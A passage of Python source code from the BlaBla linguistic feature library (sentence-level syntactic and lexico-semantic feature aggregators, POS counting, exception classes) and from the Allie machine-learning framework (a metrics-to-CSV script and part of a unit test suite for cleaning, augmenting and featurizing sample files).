Args:
None
Returns:
The ratio of the number of word types to the number of words
"""
all_words = []
all_word_lemmas = []
for so in self.sentence_objs:
all_words.extend([word.text for word in so.stanza_doc.sentences[0].words])
all_word_lemmas.extend(
[word.lemma for word in so.stanza_doc.sentences[0].words]
)
num_word_types = len(set(all_word_lemmas))
num_words = len(all_words)
return num_word_types / num_words
class Word_Length(object):
"""Class to calculate the mean word length
Ref: https://pubmed.ncbi.nlm.nih.gov/26484921/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the mean word length
Args:
None
Returns:
The mean length of the word across all sentences
"""
all_words = []
for so in self.sentence_objs:
all_words.extend([word.text for word in so.stanza_doc.sentences[0].words])
mean_word_length = np.mean([len(word) for word in all_words])
return mean_word_length
def lexico_semantic_feature_processor(sentence_objs, feature, **kwArgs):
"""This method Returns the lexico semantic features across all the sentences depending on the type of feature requested
Args:
sentence_objs (list<Sentence>): a list of Sentence objects
feature (str): a string name for the requested feature
Returns:
the feature value
"""
nr = globals()[feature.title()](sentence_objs)
return nr.handle()
```
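The processor above resolves feature names via `globals()[feature.title()]`, so a snake_case feature string maps onto one of the classes defined in this file. A hedged sketch of that call, assuming `sentence_objs` has already been built by BlaBla's sentence processor:

```python
# Hypothetical dispatch example -- sentence_objs must come from the BlaBla pipeline.
# 'noun_rate'.title() == 'Noun_Rate', the class defined above.
noun_rate = lexico_semantic_feature_processor(sentence_objs, 'noun_rate')
ttr = lexico_semantic_feature_processor(sentence_objs, 'type_token_ratio')
```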
#### File: blabla/sentence_aggregators/syntactic_feature_aggregator.py
```python
from blabla.sentence_processor.syntactic_feature_engine import *
from blabla.utils.global_params import *
class Num_Noun_Phrases(object):
"""Class to calculate the number of noun phrases
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total number of noun phrases over all sentences
Args:
None
Returns:
The total number of noun phrases over all sentences
"""
tot_num_noun_phrases = 0
for so in self.sentence_objs:
tot_num_noun_phrases += num_noun_phrases(so.const_pt)
return tot_num_noun_phrases
class Noun_Phrase_Rate(object):
"""Class to calculate the average number of noun phrases over all sentences
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the average number of noun phrases over all sentences
Args:
None
Returns:
The average number of noun phrases over all sentences
"""
tot_num_noun_phrases = 0
for so in self.sentence_objs:
tot_num_noun_phrases += num_noun_phrases(so.const_pt)
return tot_num_noun_phrases / len(self.sentence_objs)
class Num_Verb_Phrases(object):
"""Class to calculate the number of verb phrases
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total number of verb phrases over all sentences
Args:
None
Returns:
The total number of verb phrases over all sentences
"""
tot_num_verb_phrases = 0
for so in self.sentence_objs:
tot_num_verb_phrases += num_verb_phrases(so.const_pt)
return tot_num_verb_phrases
class Verb_Phrase_Rate(object):
"""Class to calculate the average number of verb phrases over all sentences
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the average number of verb phrases over all sentences
Args:
None
Returns:
The average number of verb phrases over all sentences
"""
tot_num_verb_phrases = 0
for so in self.sentence_objs:
tot_num_verb_phrases += num_verb_phrases(so.const_pt)
return tot_num_verb_phrases / len(self.sentence_objs)
class Num_Clauses(object):
"""Class to calculate the total number of clauses over all sentences
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total number of clauses over all sentences
Args:
None
Returns:
The total number of clauses over all sentences
"""
tot_num_clauses = 0
for so in self.sentence_objs:
tot_num_clauses += num_clauses(so.const_pt)
return tot_num_clauses
class Clause_Rate(object):
"""Class to calculate the number of clauses per sentences
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the average number of clauses over all sentences
Args:
None
Returns:
The average number of clauses over all sentences
"""
tot_num_clauses = 0
for so in self.sentence_objs:
tot_num_clauses += num_clauses(so.const_pt)
return tot_num_clauses / len(self.sentence_objs)
class Num_Infinitive_Phrases(object):
"""Class to calculate the total number of infinitive phrases
Note: This feature is available only for English
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total number of infinitive phrases
Args:
None
Returns:
The total number of infinitive phrases over all sentences
"""
tot_num_inf_phrases = 0
for so in self.sentence_objs:
tot_num_inf_phrases += num_infinitive_phrases(so.stanza_doc)
return tot_num_inf_phrases
class Infinitive_Phrase_Rate(object):
"""Class to calculate the number of infinitive phrases per sentence
Note: This feature is available only for English
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the number of infinitive phrases per sentence
Args:
None
Returns:
The number of infinitive phrases per sentences
"""
tot_num_inf_phrases = 0
for so in self.sentence_objs:
tot_num_inf_phrases += num_infinitive_phrases(so.stanza_doc)
return tot_num_inf_phrases / len(self.sentence_objs)
class Num_Dependent_Clauses(object):
"""Class to calculate the total number of dependent clauses
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total number of dependent clauses
Args:
None
Returns:
The total number of dependent clauses
"""
tot_num_dep_clauses = 0
for so in self.sentence_objs:
tot_num_dep_clauses += num_dependent_clauses(so.const_pt)
return tot_num_dep_clauses
class Dependent_Clause_Rate(object):
"""Class to calculate the number of dependent clauses per sentence
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the number of dependent clauses per sentence
Args:
None
Returns:
The number of dependent clauses per sentences
"""
tot_num_dep_clauses = 0
for so in self.sentence_objs:
tot_num_dep_clauses += num_dependent_clauses(so.const_pt)
return tot_num_dep_clauses / len(self.sentence_objs)
class Num_Prepositional_Phrases(object):
"""Class to calculate the total number of prepositional phrases
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total number of prepositional phrases
Args:
None
Returns:
The total number of prepositional phrases
"""
tot_num_prep_phrases = 0
for so in self.sentence_objs:
tot_num_prep_phrases += num_prepositional_phrases(so.const_pt)
return tot_num_prep_phrases
class Prepositional_Phrase_Rate(object):
"""Class to calculate the number of prepositional phrases per sentence
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the number of prepositional phrases per sentence
Args:
None
Returns:
The number of prepositional phrases per sentence
"""
tot_num_prep_phrases = 0
for so in self.sentence_objs:
tot_num_prep_phrases += num_prepositional_phrases(so.const_pt)
return tot_num_prep_phrases / len(self.sentence_objs)
class Prop_Nouns_With_Det(object):
"""Class to calculate the proportion of nouns with determiners
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the proportion of nouns that have a determiner as their dependency
Args:
None
Returns:
The number of nouns with determiners as their dependency
"""
num_nouns_with_determiners, num_nouns = 0, 0
for so in self.sentence_objs:
num_nouns_with_determiners += num_nouns_with_det(so.stanza_doc)
num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
if num_nouns != 0:
return num_nouns_with_determiners / num_nouns
return NOT_AVAILABLE
class Prop_Nouns_With_Adj(object):
"""Class to calculate the proportion of nouns with adjectives
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the proportion of nouns that have a adjective as their dependency
Args:
None
Returns:
The number of nouns with adjective as their dependency
"""
num_nouns_with_adjectives, num_nouns = 0, 0
for so in self.sentence_objs:
num_nouns_with_adjectives += num_nouns_with_adj(so.stanza_doc)
num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
if num_nouns != 0:
return num_nouns_with_adjectives / num_nouns
return NOT_AVAILABLE
class Max_Yngve_Depth(object):
"""Class to calculate the maximum Yngve depth averaged over all sentences
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the maximum Yngve depth averaged over all sentences
Args:
None
Returns:
The maximum Yngve depth averaged over all sentences
"""
total_max_yngve_depth = 0
for so in self.sentence_objs:
total_max_yngve_depth += max_yngve_depth(so.yngve_tree_root)
num_sentences = len(self.sentence_objs)
return total_max_yngve_depth / num_sentences
class Mean_Yngve_Depth(object):
"""Class to calculate the mean Yngve depth of each sentence, averaged over all sentences
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the mean Yngve depth of each sentence, averaged over all sentences
Args:
None
Returns:
The mean Yngve depth of each sentence, averaged over all sentences
"""
total_mean_yngve_depth = 0
for so in self.sentence_objs:
total_mean_yngve_depth += mean_yngve_depth(so.yngve_tree_root)
num_sentences = len(self.sentence_objs)
return total_mean_yngve_depth / num_sentences
class Total_Yngve_Depth(object):
"""Class to calculate the total Yngve depth of each sentence, averaged over all sentences
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total Yngve depth of each sentence, averaged over all sentences
Args:
None
Returns:
The total Yngve depth of each sentence, averaged over all sentences
"""
total_all_yngve_depth = 0
for so in self.sentence_objs:
total_all_yngve_depth += total_yngve_depth(so.yngve_tree_root)
num_sentences = len(self.sentence_objs)
return total_all_yngve_depth / num_sentences
class Parse_Tree_Height(object):
"""Class to calculate the constituency parse tree height
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the average height of the constituency parse tree over all sentences
Args:
None
Returns:
The constituency parse tree height averaged over all sentences
"""
tot_const_pt_height = 0
for so in self.sentence_objs:
tot_const_pt_height += const_pt_height(so.const_pt)
return tot_const_pt_height / len(self.sentence_objs)
def syntactic_feature_processor(sentence_objs, feature, **kwArgs):
"""This method Returns the syntactic features across all the sentences depending on the type of feature requested
Args:
sentence_objs (list<Sentence>): a list of Sentence objects
feature (str): a string name for the requested feature
Returns:
the feature value
"""
nr = globals()[feature.title()](sentence_objs)
return nr.handle()
```
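The same `globals()`-based dispatch applies here, so syntactic feature names follow the identical snake_case convention:

```python
# Hypothetical dispatch example for the syntactic aggregator above.
# 'parse_tree_height'.title() == 'Parse_Tree_Height'
height = syntactic_feature_processor(sentence_objs, 'parse_tree_height')
```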
#### File: blabla/sentence_processor/lexico_semantic_feature_engine.py
```python
from collections import Counter
import math
import numpy as np
from blabla.utils.global_params import *
from blabla.utils import *
def num_demonstratives(stanza_doc):
"""The number of demonstravives
Args:
stanza_doc (nltk.Tree): The dependency parse tree
Returns:
(int): the number of demonstratives
"""
return len([1 for word in stanza_doc.sentences[0].words if ((word.feats is not None) and ('PronType=Dem' in word.feats))])
def num_unique_words(stanza_doc):
"""Returns the number of unique words
Args:
stanza_doc (nltk.Tree): The dependency parse tree
Returns:
number of unique words
"""
return len(set([word.text for word in stanza_doc.sentences[0].words]))
def num_word_types(stanza_doc):
"""Returns the number of word types
Args:
stanza_doc (nltk.Tree): The dependency parse tree
Returns:
number of word types
"""
return len(set([word.lemma for word in stanza_doc.sentences[0].words]))
def compute_mean_word_length(stanza_doc):
"""Returns the mean word length
Args:
stanza_doc (nltk.Tree): The dependency parse tree
Returns:
mean length of all words in the sentence
"""
return np.mean([len(word.text) for word in stanza_doc.sentences[0].words])
```
#### File: blabla/sentence_processor/pos_tag_counting_engine.py
```python
import stanza
class PosTagCounter(object):
"""The class that counts the number of pos tags of various types in a sentence
"""
def __init__(self, stanza_doc):
"""The initialization method that take a dependency parse tree as input
Args:
stanza_doc (nltk.Tree): the dependency parse tree
Returns:
None
"""
self.stanza_doc = stanza_doc
def get_pos_tag_count(self, pos_tag):
"""Returns the number of nouns
Args:
None
Returns:
number of nouns in the sentence
"""
return len(
[
word
for word in self.stanza_doc.sentences[0].words
if (word.pos == pos_tag)
]
)
```
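A hedged usage sketch for `PosTagCounter` (not part of the original file), assuming a stanza English model has been downloaded and that POS tags are universal POS strings such as 'NOUN':

```python
# Hypothetical usage -- requires stanza.download('en') beforehand.
import stanza
nlp = stanza.Pipeline('en', processors='tokenize,pos')
doc = nlp('The quick brown fox jumps over the lazy dog')
counter = PosTagCounter(doc)
print(counter.get_pos_tag_count('NOUN'))  # counts words tagged NOUN, e.g. 'fox' and 'dog'
```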
#### File: blabla/utils/exceptions.py
```python
class EnvPathException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class EmptyStringException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class InavlidFormatException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class InavlidYamlFileException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class InavlidJSONFileException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class InvalidFeatureException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class FileError(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class FeatureExtractionException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class POSTagExtractionFailedException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class DependencyParsingTreeException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class ConstituencyTreeParsingException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class YngveTreeConstructionException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class LexicoSemanticParsingException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class MorphoSyntacticParsingException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class SyntacticParsingException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class DiscourseParsingException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
```
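All of the exception classes above share the same body; a possible refactor (a sketch only, not part of the original file) would derive them from one base class:

```python
# Hypothetical refactor sketch -- not in the original file.
class BlablaMessageError(Exception):
    """Base class for BlaBla exceptions that carry a message."""
    def __init__(self, message):
        self.message = message
        super().__init__(message)
    def __str__(self):
        return self.message

class FeatureExtractionException(BlablaMessageError):
    pass
```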
#### File: allie/models/model2csv.py
```python
import os, json
import pandas as pd
def id_folder():
curdir=os.getcwd()
directories=['audio_models', 'text_models', 'image_models', 'video_models', 'csv_models']
metrics_list=list()
model_names=list()
for i in range(len(directories)):
try:
os.chdir(curdir)
os.chdir(directories[i])
listdir=os.listdir()
folders=list()
for j in range(len(listdir)):
if listdir[j].find('.') < 0:
folders.append(listdir[j])
curdir2=os.getcwd()
for j in range(len(folders)):
os.chdir(curdir2)
os.chdir(folders[j])
os.chdir('model')
listdir2=os.listdir()
jsonfile=folders[j]+'.json'
for k in range(len(listdir2)):
if listdir2[k] == jsonfile:
g=json.load(open(jsonfile))
metrics_=g['metrics']
metrics_list.append(metrics_)
model_names.append(jsonfile[0:-5])
except:
pass
# print(directories[i])
# print('does not exist...')
return metrics_list, model_names
curdir=os.getcwd()
metrics_list, model_names=id_folder()
# regression models
meanabsolute_errors=list()
meansquared_errors=list()
median_errors=list()
r2_scores=list()
regression_models=list()
for i in range(len(model_names)):
try:
meanabsolute_errors.append(metrics_list[i]['mean_absolute_error'])
meansquared_errors.append(metrics_list[i]['mean_squared_error'])
median_errors.append(metrics_list[i]['median_absolute_error'])
r2_scores.append(metrics_list[i]['r2_score'])
regression_models.append(model_names[i])
except:
pass
# classification models
accuracies=list()
roc_curve=list()
classification_models=list()
for i in range(len(model_names)):
try:
accuracies.append(metrics_list[i]['accuracy'])
roc_curve.append(metrics_list[i]['roc_auc'])
classification_models.append(model_names[i])
except:
pass
classification_data={'model_names': classification_models,
'accuracies': accuracies,
'roc_auc': roc_curve}
regression_data={'model_names': regression_models,
'mean_absolute_errors': meanabsolute_errors,
'mean_squared_errors': meansquared_errors,
'median_absolute_errors': median_errors,
'r2_scores': r2_scores}
os.chdir(curdir)
df=pd.DataFrame.from_dict(classification_data)
df.to_csv('classification_models.csv', index=False)
df=pd.DataFrame.from_dict(regression_data)
df.to_csv('regression_models.csv', index=False)
```
#### File: allie/tests/unit_test.py
```python
import unittest, os, shutil, time, uuid, random, json, pickle
import numpy as np
import pandas as pd
###############################################################
## HELPER FUNCTIONS
## Below are some helper functions to reduce code redundancy
## During the unit testing process.
###############################################################
def prev_dir(directory):
'''
take in a directory and return its parent directory
in the tree structure.
For example,
directory = /Users/jim/desktop
prev_dir(directory) --> /Users/jim
'''
g=directory.split('/')
dir_=''
for i in range(len(g)):
if i != len(g)-1:
if i==0:
dir_=dir_+g[i]
else:
dir_=dir_+'/'+g[i]
# print(dir_)
return dir_
def clean_file(directory, clean_dir, cur_dir, train_dir, file):
'''
take in a few directories and output a clean file for audio,
text, image, and video files.
test_audio.wav --> test_audio.wav (clean)
'''
os.chdir(train_dir)
try:
os.mkdir(directory)
except:
shutil.rmtree(directory)
os.mkdir(directory)
os.chdir(directory)
shutil.copy(cur_dir+'/'+file, train_dir+'/'+directory+'/'+file)
os.chdir(clean_dir+'/'+directory)
os.system('python3 clean.py %s'%(train_dir+'/'+directory))
os.chdir(train_dir+'/'+directory)
listdir=os.listdir()
b=False
if len(listdir) == 1 and file.endswith('.csv') == False:
b=True
elif len(listdir) == 2 and file.endswith('.csv') == True:
b=True
# remove temp directory
os.chdir(train_dir)
shutil.rmtree(train_dir+'/'+directory)
msg='failed cleaning process, file does not exist in directory'
return b, msg
def augment_file(directory, augment_dir, cur_dir, train_dir, file):
'''
take in a few directories and output augmented files for audio,
text, image, and video files.
test_audio.wav --> test_audio.wav + tsaug_test_audio.wav
Typically augmentation strategies add 2x more data to the original
dataset.
'''
os.chdir(train_dir)
try:
os.mkdir(directory)
except:
shutil.rmtree(directory)
os.mkdir(directory)
shutil.copy(cur_dir+'/'+file, train_dir+'/'+directory+'/'+file)
os.chdir(augment_dir+'/'+directory)
os.system('python3 augment.py %s'%(train_dir+'/'+directory))
os.chdir(train_dir+'/'+directory)
# remove temp directory
listdir=os.listdir()
b=False
if len(listdir) > 1:
b=True
os.chdir(train_dir)
shutil.rmtree(train_dir+'/'+directory)
msg='failed augmentation, only one file exists in the directory'
return b, msg
def featurize_file(features_dir, cur_dir, train_dir, file, sampletype, default_features):
'''
take in a file and output a featurized .JSON file using
Allie internal Feature API.
test.wav --> test.json, test.wav with features in test.json
'''
directory='%s_features'%(sampletype)
folder=train_dir+'/'+directory
os.chdir(train_dir)
try:
os.mkdir(directory)
except:
shutil.rmtree(directory)
os.mkdir(directory)
# put test audio file in directory
shutil.copy(cur_dir+'/'+file, folder+'/'+file)
os.chdir(features_dir+'/%s_features/'%(sampletype))
features_list=default_features
for i in range(len(features_list)):
print('------------------------------')
print('FEATURIZING - %s'%(features_list[i].upper()))
print('------------------------------')
os.system('python3 featurize.py %s %s'%(folder, features_list[i]))
# now that we have the folder let's check if the array has all the features
os.chdir(folder)
gopen=open('test_%s.json'%(sampletype),'r')
g=json.load(gopen)
features=g['features'][sampletype]
gopen.close()
test_features=list(features)
if test_features == features_list:
b=True
else:
b=False
notcount=list()
for i in range(len(features_list)):
if features_list[i] not in test_features:
notcount.append(features_list[i])
msg=str(notcount) + ' failed during featurization'
return b, msg
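# Hypothetical call: featurize test_audio.wav with the default audio feature set;
# ok, msg = featurize_file(features_dir, cur_dir, train_dir, 'test_audio.wav', 'audio', default_audio_features)
# ok is True when every requested featurizer wrote its features into test_audio.json.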
def transcribe_file(train_dir, file, sampletype, default_transcript):
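	# take in a file and verify that the default transcriber for this sample type
	# wrote a transcript into the featurized .JSON output; note that this helper
	# relies on the module-level cur_dir and features_dir variables defined below.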
os.chdir(train_dir)
directory='%s_transcription'%(sampletype)
folder=train_dir+'/'+directory
os.chdir(train_dir)
try:
os.mkdir(directory)
except:
shutil.rmtree(directory)
os.mkdir(directory)
# put test audio file in directory
shutil.copy(cur_dir+'/'+file, folder+'/'+file)
os.chdir(features_dir+'/%s_features/'%(sampletype))
os.system('python3 featurize.py %s'%(folder))
# now that we have the folder let's check if the array has all the features
os.chdir(folder)
g=json.load(open('test_%s.json'%(sampletype)))
transcripts=list(g['transcripts'][sampletype])
if default_transcript[0] in transcripts:
msg='success'
b=True
else:
msg='failure'
b=False
os.chdir(train_dir)
shutil.rmtree(directory)
return b, msg
def model_predict(filetype, testfile, loadmodel_dir, load_dir):
# copy machine learning model into image_model dir
os.chdir(cur_dir+'/helpers/models/%s_models/'%(filetype))
listdir=os.listdir()
temp=os.getcwd()
tempfiles=list()
os.chdir(loadmodel_dir)
if '%s_models'%(filetype) not in os.listdir():
os.mkdir('%s_models'%(filetype))
os.chdir(temp)
# copy audio machine learning model into directory (one_two)
tempfiles=list()
for i in range(len(listdir)):
try:
shutil.copytree(temp+'/'+listdir[i], loadmodel_dir+'/%s_models/'%(filetype)+listdir[i])
except:
pass
tempfiles.append(listdir[i])
# copy file in load_dir
shutil.copy(cur_dir+'/'+testfile, load_dir+'/'+testfile)
# copy machine learning models into proper models directory
os.chdir(cur_dir+'/helpers/models/%s_models/'%(filetype))
listdir=os.listdir()
# copy audio machine learning model into directory (one_two)
tempfiles=list()
for i in range(len(listdir)):
try:
shutil.copytree(temp+'/'+listdir[i], loadmodel_dir+'/%s_models/'%(filetype)+listdir[i])
except:
pass
tempfiles.append(listdir[i])
os.chdir(loadmodel_dir)
os.system('python3 load.py')
	os.chdir(load_dir)
listdir=os.listdir()
b=False
for i in range(len(listdir)):
if filetype == 'audio':
if listdir[i].endswith('.wav') and listdir[i][0:-4]+'.json' in listdir:
b=True
break
elif filetype == 'text':
if listdir[i].endswith('.txt') and listdir[i][0:-4]+'.json' in listdir:
b=True
break
elif filetype == 'image':
if listdir[i].endswith('.png') and listdir[i][0:-4]+'.json' in listdir:
b=True
break
elif filetype == 'video':
if listdir[i].endswith('.mp4') and listdir[i][0:-4]+'.json' in listdir:
b=True
break
# now remove all the temp files
os.chdir(loadmodel_dir+'/%s_models'%(filetype))
for i in range(len(tempfiles)):
shutil.rmtree(tempfiles[i])
msg = filetype + ' model prediction failed.'
return b, msg
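# Hypothetical call mirroring the audio loading test below:
# ok, msg = model_predict('audio', 'test_audio.wav', loadmodel_dir, load_dir)
# ok is True when load.py wrote a .json prediction next to the copied sample file.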
###############################################################
## INITIALIZATION ##
###############################################################
# initialize variables for the test
cur_dir=os.getcwd()
prevdir= prev_dir(cur_dir)
load_dir = prevdir+'/load_dir'
train_dir = prevdir + '/train_dir'
model_dir = prevdir+ '/training'
features_dir=prevdir+'/features'
loadmodel_dir = prevdir+'/models'
clean_dir=prevdir+'/cleaning/'
augment_dir=prevdir+'/augmentation'
test_dir=prevdir+'/tests'
visualization_dir=prevdir+'/visualize'
preprocessing_dir=prevdir+'/preprocessing'
# settings
settings=json.load(open(prevdir+'/settings.json'))
clean_data=settings['clean_data']
augment_data=settings['augment_data']
# transcript settings
default_audio_transcript=settings['default_audio_transcriber']
default_image_transcript=settings['default_image_transcriber']
default_text_transcript=settings['default_text_transcriber']
default_video_transcript=settings['default_video_transcriber']
default_csv_transcript=settings['default_csv_transcriber']
transcribe_audio=settings['transcribe_audio']
transcribe_text=settings['transcribe_text']
transcribe_image=settings['transcribe_image']
transcribe_video=settings['transcribe_video']
transcribe_csv=settings['transcribe_csv']
# feature settings
default_audio_features=settings['default_audio_features']
default_text_features=settings['default_text_features']
default_image_features=settings['default_image_features']
default_video_features=settings['default_video_features']
default_csv_features=settings['default_csv_features']
# cleaning settings
default_audio_cleaners=settings['default_audio_cleaners']
default_text_cleaners=settings['default_text_cleaners']
default_image_cleaners=settings['default_image_cleaners']
default_video_cleaners=settings['default_video_cleaners']
default_csv_cleaners=settings['default_csv_cleaners']
# augmentation settings
default_audio_augmenters=settings['default_audio_augmenters']
default_text_augmenters=settings['default_text_augmenters']
default_image_augmenters=settings['default_image_augmenters']
default_video_augmenters=settings['default_video_augmenters']
default_csv_augmenters=settings['default_csv_augmenters']
# preprocessing settings
select_features=settings['select_features']
reduce_dimensions=settings['reduce_dimensions']
scale_features=settings['scale_features']
default_scaler=settings['default_scaler']
default_feature_selector=settings['default_feature_selector']
default_dimensionality_reducer=settings['default_dimensionality_reducer']
dimension_number=settings['dimension_number']
feature_number=settings['feature_number']
# other settings for training scripts
training_scripts=settings['default_training_script']
model_compress=settings['model_compress']
# directories
audiodir=loadmodel_dir+'/audio_models'
textdir=loadmodel_dir+'/text_models'
imagedir=loadmodel_dir+'/image_models'
videodir=loadmodel_dir+'/video_models'
csvdir=loadmodel_dir+'/csv_models'
###############################################################
## UNIT TESTS ##
###############################################################
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_dependencies(unittest.TestCase):
'''
DEPENDENCY TESTS
Confirms that all the modules are installed correctly, along with
all brew install commands.
'''
#### ##### ##### ##### ##### ##### ##### ##### ##### #####
def test_sox(self):
# test brew installation by merging two test files
os.chdir(cur_dir)
os.system('sox test_audio.wav test_audio.wav test2.wav')
if 'test2.wav' in os.listdir():
b=True
else:
b=False
self.assertEqual(True, b)
def test_c_ffmpeg(self):
# test FFmpeg installation with test_audio file conversion
os.chdir(cur_dir)
if 'test_audio.mp3' in os.listdir():
os.remove('test_audio.mp3')
os.system('ffmpeg -i test_audio.wav test_audio.mp3 -y')
if 'test_audio.mp3' in os.listdir():
b=True
else:
b=False
self.assertEqual(True, b)
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_cleaning(unittest.TestCase):
'''
CLEANING API TESTS
Tests file cleaning capabilities by removing duplicates, etc.
across all file types.
'''
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
def test_audio_clean(self, clean_dir=clean_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='audio_cleaning'
file='test_audio.wav'
b, msg = clean_file(directory, clean_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
def test_text_clean(self, clean_dir=clean_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='text_cleaning'
file='test_text.txt'
b, msg = clean_file(directory, clean_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
def test_image_clean(self, clean_dir=clean_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='image_cleaning'
file='test_image.png'
b, msg = clean_file(directory, clean_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
def test_video_clean(self, clean_dir=clean_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='video_cleaning'
file='test_video.mp4'
b, msg = clean_file(directory, clean_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
def test_csv_clean(self, clean_dir=clean_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='csv_cleaning'
file='test_csv.csv'
b, msg = clean_file(directory, clean_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_augmentation(unittest.TestCase):
'''
AUGMENTATION API TESTS
Tests augmentation capabilities for all data types.
'''
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
def test_audio_augment(self, augment_dir=augment_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='audio_augmentation'
file='test_audio.wav'
b, msg = augment_file(directory, augment_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
def test_text_augment(self, augment_dir=augment_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='text_augmentation'
file='test_text.txt'
b, msg = augment_file(directory, augment_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
def test_image_augment(self, augment_dir=augment_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='image_augmentation'
file='test_image.png'
b, msg = augment_file(directory, augment_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
def test_video_augment(self, augment_dir=augment_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='video_augmentation'
file='test_video.mp4'
b, msg=augment_file(directory, augment_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
def test_csv_augment(self, augment_dir=augment_dir, clean_dir=clean_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='csv_augmentation'
file='test_csv.csv'
b, msg = augment_file(directory, augment_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_features(unittest.TestCase):
'''
FEATURIZATION API TESTS
Tests featurization capabilities across all training scripts.
'''
#### ##### ##### ##### ##### ##### ##### ##### ##### #####
def test_audio_features(self, features_dir=features_dir, train_dir=train_dir, cur_dir=cur_dir, default_audio_features=default_audio_features):
file='test_audio.wav'
sampletype='audio'
default_features=default_audio_features
b, msg = featurize_file(features_dir, cur_dir, train_dir, file, sampletype, default_features)
self.assertEqual(True, b, msg)
def test_text_features(self, features_dir=features_dir, train_dir=train_dir, cur_dir=cur_dir, default_text_features=default_text_features):
file='test_text.txt'
sampletype='text'
default_features=default_text_features
b, msg = featurize_file(features_dir, cur_dir, train_dir, file, sampletype, default_features)
self.assertEqual(True, b, msg)
def test_image_features(self, features_dir=features_dir, train_dir=train_dir, cur_dir=cur_dir, default_image_features=default_image_features):
file='test_image.png'
sampletype='image'
default_features=default_image_features
